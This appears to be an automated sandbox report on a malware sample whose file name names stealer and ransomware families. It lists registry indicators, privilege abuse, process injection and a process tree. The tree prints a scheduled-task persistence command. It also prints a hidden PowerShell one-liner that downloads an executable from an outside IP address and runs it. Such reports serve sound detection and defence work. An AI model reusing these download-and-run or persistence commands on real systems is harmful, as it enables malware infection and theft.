TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEYKSCXV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31ccec37c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PQPYAYJJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CamMenuMaker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fontdrvhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language datAF33.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Abspawnhlp.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor Updater.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1172 timeout.exe -
Modifies data under HKEY_USERS 54 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ datAF33.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" datAF33.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" datAF33.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" datAF33.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" datAF33.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Updater.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Updater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Updater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Updater.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings Abspawnhlp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 840 schtasks.exe 3988 schtasks.exe 444 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3928 CamMenuMaker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4440 powershell.exe 4440 powershell.exe 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 1568 rapes.exe 1568 rapes.exe 5680 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 5852 MSBuild.exe 5852 MSBuild.exe 5852 MSBuild.exe 5852 MSBuild.exe 3252 MSBuild.exe 3252 MSBuild.exe 3252 MSBuild.exe 3252 MSBuild.exe 4908 MSBuild.exe 4908 MSBuild.exe 4908 MSBuild.exe 4908 MSBuild.exe 3832 msiexec.exe 3832 msiexec.exe 4536 12c306b2f8.exe 4536 12c306b2f8.exe 4536 12c306b2f8.exe 4536 12c306b2f8.exe 4536 12c306b2f8.exe 4536 12c306b2f8.exe 5948 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 2008 Abspawnhlp.exe 5532 rapes.exe 5532 rapes.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 5764 MSBuild.exe 5764 MSBuild.exe 5764 MSBuild.exe 5764 MSBuild.exe 3824 cmd.exe 3824 cmd.exe 3824 cmd.exe 3044 b316c3b86e.exe 3044 b316c3b86e.exe 3044 b316c3b86e.exe 3044 b316c3b86e.exe 3044 b316c3b86e.exe 3044 b316c3b86e.exe 3832 msiexec.exe 3832 msiexec.exe 5964 CamMenuMaker.exe 5004 CamMenuMaker.exe 5004 CamMenuMaker.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 668 Process not Found 668 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 340 Abspawnhlp.exe 340 Abspawnhlp.exe 340 Abspawnhlp.exe 5288 Abspawnhlp.exe 5288 Abspawnhlp.exe 2008 Abspawnhlp.exe 2008 Abspawnhlp.exe 5004 CamMenuMaker.exe 4356 CamMenuMaker.exe 2008 Abspawnhlp.exe 5288 Abspawnhlp.exe 4492 CamMenuMaker.exe 4356 CamMenuMaker.exe 5004 CamMenuMaker.exe 4492 CamMenuMaker.exe 5628 Abspawnhlp.exe 5628 Abspawnhlp.exe 4856 Abspawnhlp.exe 4856 Abspawnhlp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 2688 NHq7LaU.exe Token: SeDebugPrivilege 4068 chrome.exe Token: SeShutdownPrivilege 4540 msiexec.exe Token: SeIncreaseQuotaPrivilege 4540 msiexec.exe Token: SeSecurityPrivilege 3832 msiexec.exe Token: SeCreateTokenPrivilege 4540 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4540 msiexec.exe Token: SeLockMemoryPrivilege 4540 msiexec.exe Token: SeIncreaseQuotaPrivilege 4540 msiexec.exe Token: SeMachineAccountPrivilege 4540 msiexec.exe Token: SeTcbPrivilege 4540 msiexec.exe Token: SeSecurityPrivilege 4540 msiexec.exe Token: SeTakeOwnershipPrivilege 4540 msiexec.exe Token: SeLoadDriverPrivilege 4540 msiexec.exe Token: SeSystemProfilePrivilege 4540 msiexec.exe Token: SeSystemtimePrivilege 4540 msiexec.exe Token: SeProfSingleProcessPrivilege 4540 msiexec.exe Token: SeIncBasePriorityPrivilege 4540 msiexec.exe Token: SeCreatePagefilePrivilege 4540 msiexec.exe Token: SeCreatePermanentPrivilege 4540 msiexec.exe Token: SeBackupPrivilege 4540 msiexec.exe Token: SeRestorePrivilege 4540 msiexec.exe Token: SeShutdownPrivilege 4540 msiexec.exe Token: SeDebugPrivilege 4540 msiexec.exe Token: SeAuditPrivilege 4540 msiexec.exe Token: SeSystemEnvironmentPrivilege 4540 msiexec.exe Token: SeChangeNotifyPrivilege 4540 msiexec.exe Token: SeRemoteShutdownPrivilege 4540 msiexec.exe Token: SeUndockPrivilege 4540 msiexec.exe Token: SeSyncAgentPrivilege 4540 msiexec.exe Token: SeEnableDelegationPrivilege 4540 msiexec.exe Token: SeManageVolumePrivilege 4540 msiexec.exe Token: SeImpersonatePrivilege 4540 msiexec.exe Token: SeCreateGlobalPrivilege 4540 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe Token: SeTakeOwnershipPrivilege 3832 msiexec.exe Token: SeRestorePrivilege 3832 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4068 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1156 wrote to memory of 1848 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1156 wrote to memory of 1848 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1156 wrote to memory of 1848 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1156 wrote to memory of 1072 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1156 wrote to memory of 1072 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1156 wrote to memory of 1072 1156 2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 1848 wrote to memory of 840 1848 cmd.exe 89 PID 1848 wrote to memory of 840 1848 cmd.exe 89 PID 1848 wrote to memory of 840 1848 cmd.exe 89 PID 1072 wrote to memory of 4440 1072 mshta.exe 92 PID 1072 wrote to memory of 4440 1072 mshta.exe 92 PID 1072 wrote to memory of 4440 1072 mshta.exe 92 PID 4440 wrote to memory of 3964 4440 powershell.exe 99 PID 4440 wrote to memory of 3964 4440 powershell.exe 99 PID 4440 wrote to memory of 3964 4440 powershell.exe 99 PID 3964 wrote to memory of 1568 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 101 PID 3964 wrote to memory of 1568 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 101 PID 3964 wrote to memory of 1568 3964 TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE 101 PID 1568 wrote to memory of 5184 1568 rapes.exe 104 PID 1568 wrote to memory of 5184 1568 rapes.exe 104 PID 1568 wrote to memory of 5184 1568 rapes.exe 104 PID 5184 wrote to memory of 5680 5184 PQPYAYJJ.exe 105 PID 5184 wrote to memory of 5680 5184 PQPYAYJJ.exe 105 PID 5184 wrote to memory of 5680 5184 PQPYAYJJ.exe 105 PID 5680 wrote to memory of 340 5680 Abspawnhlp.exe 106 PID 5680 wrote to memory of 340 5680 Abspawnhlp.exe 106 PID 5680 wrote to memory of 340 5680 Abspawnhlp.exe 106 PID 1568 wrote to memory of 4460 1568 rapes.exe 107 PID 1568 wrote to memory of 4460 1568 rapes.exe 107 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 4460 wrote to memory of 5852 4460 h8NlU62.exe 108 PID 340 wrote to memory of 5876 340 Abspawnhlp.exe 109 PID 340 wrote to memory of 5876 340 Abspawnhlp.exe 109 PID 340 wrote to memory of 5876 340 Abspawnhlp.exe 109 PID 1568 wrote to memory of 2688 1568 rapes.exe 110 PID 1568 wrote to memory of 2688 1568 rapes.exe 110 PID 2688 wrote to memory of 3988 2688 NHq7LaU.exe 111 PID 2688 wrote to memory of 3988 2688 NHq7LaU.exe 111 PID 2688 wrote to memory of 4068 2688 NHq7LaU.exe 113 PID 2688 wrote to memory of 4068 2688 NHq7LaU.exe 113 PID 340 wrote to memory of 5876 340 Abspawnhlp.exe 109 PID 340 wrote to memory of 5876 340 Abspawnhlp.exe 109 PID 4068 wrote to memory of 444 4068 chrome.exe 114 PID 4068 wrote to memory of 444 4068 chrome.exe 114 PID 1568 wrote to memory of 760 1568 rapes.exe 117 PID 1568 wrote to memory of 760 1568 rapes.exe 117 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 760 wrote to memory of 3252 760 qWR3lUj.exe 119 PID 340 wrote to memory of 3824 340 Abspawnhlp.exe 121 PID 340 wrote to memory of 3824 340 Abspawnhlp.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2616
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4652
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4792
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3468
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn aibuVmaBZ6h /tr "mshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn aibuVmaBZ6h /tr "mshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:840
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\AhOrZxpaK.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Local\TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE"C:\Users\Admin\AppData\Local\TempRYG1HCKJMQRKDB89IPOYX9TD945Q4YBU.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5184 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5680 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵
- Downloads MZ/PE file
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5876 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6084 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2008 -
C:\Users\Admin\Abspawnhlp.exeC:\Users\Admin\Abspawnhlp.exe12⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- System Location Discovery: System Language Discovery
PID:3152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1052
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
PID:5892
-
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"10⤵
- Executes dropped EXE
PID:6132 -
